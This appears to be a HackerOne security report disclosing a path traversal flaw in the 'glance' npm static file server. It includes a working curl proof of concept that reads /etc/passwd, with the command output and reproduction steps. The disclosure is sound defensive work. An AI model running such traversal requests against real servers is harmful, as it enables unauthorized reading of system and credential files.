Node.js third-party modules: [glance] Path Traversal in glance static file server allows to read content of arbitrary file

Hi Guys,

There is Path Traversal vulnerability in glance module. This issue allows to read arbitrary files from the server, where glance is installed.

Module

glance

a quick disposable http server for static files

https://www.npmjs.com/package/glance

Stats
33 downloads in the last day
34 downloads in the last week
269 downloads in the last month

~3000 estimated downloads per year

Description

glance serves files from the server where was installed. No path sanitization is implemented, thus malicious user is able to read content of any file from the server using simple curl command (adjust number of …/ to reflect your system):

curl -v --path-as-is http://127.0.0.1:8080/../../../../../../etc/passwd

The result:

me:~/playground/hackerone/Node$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../../etc/passwd
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< content-type: application/octet-stream
< etag: 6d51e6677c898282619137b0c74f0cab
< last-modified: Fri, 26 Jan 2018 12:04:19 +0000
< content-length: 2559
< Date: Mon, 29 Jan 2018 10:23:45 GMT
< Connection: keep-alive
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
(..)
guest-cz1ton:x:999:999:Guest:/tmp/guest-cz1ton:/bin/bash
postgres:x:124:131:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
* Connection #0 to host 127.0.0.1 left intact
me:~/playground/hackerone/Node$

Steps To Reproduce:

• install glance:

$ npm install glance

• run glance in direcotry of your choice

me:~/playground/hackerone/Node$ ./node_modules/glance/bin/glance.js --verbose --dir ./node_modules/
glance serving node_modules/ on port 8080
::1 read node_modules/
::1 read node_modules/bash-color/
::1 read node_modules/bash-color/README.md
::1 read ./
::1 read malware_frame.html
::1 read malware.js
ERR404 ::ffff:127.0.0.1 on ../../../etc/passwd
ERR404 ::ffff:127.0.0.1 on ../../../../etc/passwd
::ffff:127.0.0.1 read ../../../../../etc/passwd
::ffff:127.0.0.1 read ../../../../../etc/passwd

You can see in the log above all my requests sent to glance, including curl requests from PoC, where I was able to traverse directory tree and read content of /etc/passwd file

Supporting Material/References:

• Ubuntu 16.04 LTS
• Chromium 66.0.3333.0 (Developer Build) (64-bit)
• Node.js version: v8.9.4 LTS
• npm version: 5.6.0
• curl 7.47.0

Please feel free to invite module maintainer to this report. I haven’t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.

I hope my report will help to keep Node.js ecosystem and its users safe in the future.

Regards,

Rafal ‘bl4de’ Janicki

Impact

This vulnerability allows malicious user to read content of arbitrary file from the server.